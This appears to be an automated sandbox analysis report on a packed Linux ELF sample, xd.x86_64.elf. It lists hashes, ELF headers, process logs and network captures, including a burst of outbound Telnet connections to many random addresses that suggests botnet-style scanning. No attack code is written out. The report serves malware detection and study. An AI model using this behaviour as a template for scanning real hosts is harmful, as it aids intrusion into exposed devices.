                                                    MD5:3AF77E630DA00B3BE24F4E8AA5D78B13
                                                    SHA1:BCF2D99E002F6DE2413A183227B011CFBEF5673D
                                                    SHA-256:EB1CBBA20845237B4409274D693FEAE13F835274DA3337B7A9D14F4D7FDF9DEA
                                                    SHA-512:8524B1E8A761F962B32F396812099B9B0B2DCF3C9FCA8605424753CFCFF4DC67EDC5EE1D8C91B9C0ED7FAE6BB1E752898B8D514B7C421D1839D6FEDA609C593C
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce
                                                    File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                                    Entropy (8bit):7.9621733549693054
                                                    TrID:
                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                    File name:xd.x86_64.elf
                                                    File size:38'924 bytes
                                                    MD5:e59bf6760fd1be7b7fdb51b0c8038c27
                                                    SHA1:29b0741492548fc34e5c2ec6855f9240dbeb0788
                                                    SHA256:cd21516feb04d3b1fa6eac9d7db9b633d965f63fd93efaf3f6f042f894302f67
                                                    SHA512:5f5c67d442eed2b4bb51ad05f6b3b82229546fe4d9fa5c96860409737d2767a4cc0987f19896a636fbdc1019d79738e9e7d66274a08f752d2846d913485eb6bd
                                                    SSDEEP:768:NcRbhrK2x7kJUY7v9bpZf75WCFRcnLbPbBQcZ/eSV7GorLCNVMG5Vx07P:NcPFx9Y7Br75TF0LT/lzV7XLyDbOP
                                                    TLSH:8C03F1C710F9E6FCE074A4F32C9EA2D0E967A837D46B1A8792C1F8BF4577C611806650
                                                    File Content Preview:.ELF..............>.............@...................@.8...@.....................................................................(.......(zQ.....(zQ.............................Q.td.....................................................G..UPX!H....... M.. M.

                                                    ELF header

                                                    Class:ELF64
                                                    Data:2's complement, little endian
                                                    Version:1 (current)
                                                    Machine:Advanced Micro Devices X86-64
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x1085d8
                                                    Flags:0x0
                                                    ELF Header Size:64
                                                    Program Header Offset:64
                                                    Program Header Size:56
                                                    Number of Program Headers:3
                                                    Section Header Offset:0
                                                    Section Header Size:64
                                                    Number of Section Headers:0
                                                    Header String Table Index:0
Type       Offset  Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align     Prog Interpreter  Section Mappings
LOAD       0x0     0x100000         0x100000          0x9714     0x9714       7.9647   0x5    R E                0x100000
LOAD       0xa28   0x517a28         0x517a28          0x0        0x0          0.0000   0x6    RW                 0x1000
GNU_STACK  0x0     0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x8


                                                    • Total Packets: 190
                                                    • 5466 undefined
                                                    • 443 (HTTPS)
                                                    • 80 (HTTP)
                                                    • 53 (DNS)
                                                    • 23 (Telnet)
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23177.98.91.168
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23112.84.240.177
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23253.129.188.166
                                                    Apr 2, 2025 20:48:08.311110020 CEST5436823192.168.2.23220.207.160.167
                                                    Apr 2, 2025 20:48:08.311113119 CEST5436823192.168.2.235.125.118.195
                                                    Apr 2, 2025 20:48:08.311113119 CEST5436823192.168.2.23179.246.229.122
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.23223.40.246.81
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.2398.29.211.87
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.2361.129.21.21
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.234.45.31.125
                                                    Apr 2, 2025 20:48:08.311117887 CEST5436823192.168.2.23117.21.106.178
                                                    Apr 2, 2025 20:48:08.311113119 CEST5436823192.168.2.2380.252.169.179
                                                    Apr 2, 2025 20:48:08.311114073 CEST5436823192.168.2.2397.117.70.242
                                                    Apr 2, 2025 20:48:08.311114073 CEST5436823192.168.2.23124.188.122.223
                                                    Apr 2, 2025 20:48:08.311114073 CEST5436823192.168.2.2341.62.227.22
                                                    Apr 2, 2025 20:48:08.311139107 CEST5436823192.168.2.23250.227.159.174
                                                    Apr 2, 2025 20:48:08.311155081 CEST5436823192.168.2.2313.223.156.99
                                                    Apr 2, 2025 20:48:08.311155081 CEST5436823192.168.2.2388.88.22.111
                                                    Apr 2, 2025 20:48:08.311155081 CEST5436823192.168.2.23161.218.18.111
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.23218.134.28.158
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.23197.234.99.229
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.23183.149.65.171
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.2335.195.56.8
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23130.228.130.43
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23246.165.174.214
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2340.181.2.94
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23243.161.107.20
                                                    Apr 2, 2025 20:48:08.311167955 CEST5436823192.168.2.23216.210.78.168
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.23222.125.243.210
                                                    Apr 2, 2025 20:48:08.311167955 CEST5436823192.168.2.23159.34.85.128
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23184.98.147.135
                                                    Apr 2, 2025 20:48:08.311167955 CEST5436823192.168.2.23180.23.122.31
                                                    Apr 2, 2025 20:48:08.311170101 CEST5436823192.168.2.2368.166.120.203
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23242.198.237.200
                                                    Apr 2, 2025 20:48:08.311170101 CEST5436823192.168.2.2395.254.250.93
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23252.123.160.224
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2394.96.217.68
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23121.184.107.27
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2359.95.168.236
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2337.241.86.139
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2313.168.105.138
                                                    Apr 2, 2025 20:48:08.311223984 CEST5436823192.168.2.2387.250.9.68
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23110.59.198.27
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23103.130.5.196
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23177.13.52.64
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23146.247.144.15
                                                    Apr 2, 2025 20:48:08.311233044 CEST5436823192.168.2.23204.4.146.189
                                                    Apr 2, 2025 20:48:08.311233044 CEST5436823192.168.2.23249.228.0.167
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.239.201.221.80
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.23149.172.155.16
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.23158.98.57.71
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.23178.99.178.38
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.2359.2.114.24
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.2318.6.19.3
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.23119.217.95.162
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.23152.100.68.87
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.23210.237.235.103
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.23124.232.207.12
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23180.39.170.15
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23203.237.190.86
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23191.120.161.81
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23253.226.63.167
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.2365.18.118.7
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23161.162.19.140
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23189.254.49.59
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2312.186.243.2
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23126.208.88.215
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23165.109.69.21
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2320.32.212.218
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.2390.110.144.185
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23248.255.238.237
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23204.147.129.185
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2347.170.129.90
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23119.165.25.70
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2376.237.65.216
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23112.109.12.70
                                                    Apr 2, 2025 20:48:08.311254978 CEST5436823192.168.2.23112.234.76.96
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23197.82.38.214
                                                    Apr 2, 2025 20:48:08.311254978 CEST5436823192.168.2.23198.97.53.33
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23113.150.21.42
                                                    Apr 2, 2025 20:48:08.311253071 CEST5436823192.168.2.23172.225.70.132
                                                    Apr 2, 2025 20:48:08.311265945 CEST5436823192.168.2.23165.115.225.248
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2317.249.197.30
                                                    Apr 2, 2025 20:48:08.311254978 CEST5436823192.168.2.23114.223.17.148
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23255.86.231.30
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.23190.91.109.14
                                                    Apr 2, 2025 20:48:08.311253071 CEST5436823192.168.2.23247.204.7.139
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.2314.247.77.19
                                                    Apr 2, 2025 20:48:08.311253071 CEST5436823192.168.2.23246.138.217.164
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23157.188.47.205
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23249.112.2.121
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.2344.20.4.71
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23213.175.48.125
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23206.237.4.19
                                                    Apr 2, 2025 20:48:08.527679920 CEST546652458213.209.129.92192.168.2.23
                                                    Apr 2, 2025 20:48:12.832271099 CEST42836443192.168.2.2391.189.91.43
                                                    Apr 2, 2025 20:48:14.112283945 CEST4251680192.168.2.23109.202.202.202
                                                    Apr 2, 2025 20:48:28.958058119 CEST43928443192.168.2.2391.189.91.42
                                                    Apr 2, 2025 20:48:31.584300995 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:31.584347010 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:31.584413052 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:33.864469051 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:33.864495039 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.091912031 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.092190981 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.092648983 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.092648983 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.092660904 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.092677116 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.092730045 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.093086004 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.093086004 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.093107939 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.093456030 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.296890020 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297080040 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297080040 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297080040 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297123909 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297194958 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297210932 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297230005 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297262907 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297264099 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297274113 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297278881 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297302008 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297332048 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297333002 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297364950 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297380924 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297385931 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297434092 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297513962 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297519922 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297554016 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297574043 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297574043 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297583103 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297589064 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.733427048 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.733515024 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.733516932 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734708071 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734708071 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734708071 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734730959 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:39.196595907 CEST42836443192.168.2.2391.189.91.43
                                                    Apr 2, 2025 20:48:45.339828968 CEST4251680192.168.2.23109.202.202.202
                                                    Apr 2, 2025 20:49:09.912426949 CEST43928443192.168.2.2391.189.91.42
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 20:48:31.308300972 CEST | 43929 | 53 | 192.168.2.23 | 1.1.1.1
Apr 2, 2025 20:48:31.308353901 CEST | 46856 | 53 | 192.168.2.23 | 1.1.1.1
Apr 2, 2025 20:48:31.415242910 CEST | 53 | 43929 | 1.1.1.1 | 192.168.2.23
Apr 2, 2025 20:48:31.415497065 CEST | 53 | 46856 | 1.1.1.1 | 192.168.2.23
Apr 2, 2025 20:48:31.469014883 CEST | 44542 | 53 | 192.168.2.23 | 1.1.1.1
Apr 2, 2025 20:48:31.577485085 CEST | 53 | 44542 | 1.1.1.1 | 192.168.2.23
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Apr 2, 2025 20:48:35.918900967 CEST | 192.168.2.23 | 192.168.2.1 | 8283 | (Port unreachable) | Destination Unreachable
Apr 2, 2025 20:49:55.935602903 CEST | 192.168.2.23 | 192.168.2.1 | 8283 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 2, 2025 20:48:31.308300972 CEST | 192.168.2.23 | 1.1.1.1 | 0x5f05 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
Apr 2, 2025 20:48:31.308353901 CEST | 192.168.2.23 | 1.1.1.1 | 0x321f | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false
Apr 2, 2025 20:48:31.469014883 CEST | 192.168.2.23 | 1.1.1.1 | 0xbc7a | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 2, 2025 20:48:31.415242910 CEST | 1.1.1.1 | 192.168.2.23 | 0x5f05 | No error (0) | daisy.ubuntu.com |  | 162.213.35.25 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 20:48:31.415242910 CEST | 1.1.1.1 | 192.168.2.23 | 0x5f05 | No error (0) | daisy.ubuntu.com |  | 162.213.35.24 | A (IP address) | IN (0x0001) | false
                                                    • daisy.ubuntu.com
Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.23 | 37606 | 162.213.35.24 | 443
Timestamp | Bytes transferred | Direction | Data
2025-04-02 18:48:34 UTC | 307 | OUT | POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1
Host: daisy.ubuntu.com
Accept: */*
Content-Type: application/octet-stream
X-Whoopsie-Version: 0.2.69ubuntu0.3
Content-Length: 164887
Expect: 100-continue
2025-04-02 18:48:34 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                    Data Ascii: ed Set 2 keyboard: always reports core eventsAug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (**) Option "Device" "/dev/input/event1"Aug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (**) Option "_source" "server/udev"Aug 17 20:25
                                                    2025-04-02 18:48:34 UTC 279 IN HTTP/1.1 400 Bad Request
                                                    Date: Wed, 02 Apr 2025 18:48:34 GMT
                                                    Server: gunicorn/19.7.1
                                                    X-Daisy-Revision-Number: 979
                                                    X-Oops-Repository-Version: 0.0.0
                                                    Strict-Transport-Security: max-age=2592000
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    17
                                                    Crash already reported.
                                                    0


                                                    System Behavior

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cat
                                                    Arguments:cat /tmp/tmp.HvEmy83FD7
                                                    File size:43416 bytes
                                                    MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/head
                                                    Arguments:head -n 10
                                                    File size:47480 bytes
                                                    MD5 hash:fd96a67145172477dd57131396fc9608

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/tr
                                                    Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                    File size:51544 bytes
                                                    MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cut
                                                    Arguments:cut -c -80
                                                    File size:47480 bytes
                                                    MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cat
                                                    Arguments:cat /tmp/tmp.HvEmy83FD7
                                                    File size:43416 bytes
                                                    MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/head
                                                    Arguments:head -n 10
                                                    File size:47480 bytes
                                                    MD5 hash:fd96a67145172477dd57131396fc9608

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/tr
                                                    Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                    File size:51544 bytes
                                                    MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cut
                                                    Arguments:cut -c -80
                                                    File size:47480 bytes
                                                    MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                    Start time (UTC):18:48:02
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:02
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:/tmp/xd.x86_64.elf
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:07
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:07
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:07
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Start time (UTC):18:48:17
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:17
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/journalctl
                                                    Arguments:/usr/bin/journalctl --smart-relinquish-var
                                                    File size:80120 bytes
                                                    MD5 hash:bf3a987344f3bacafc44efd882abda8b

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:29
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
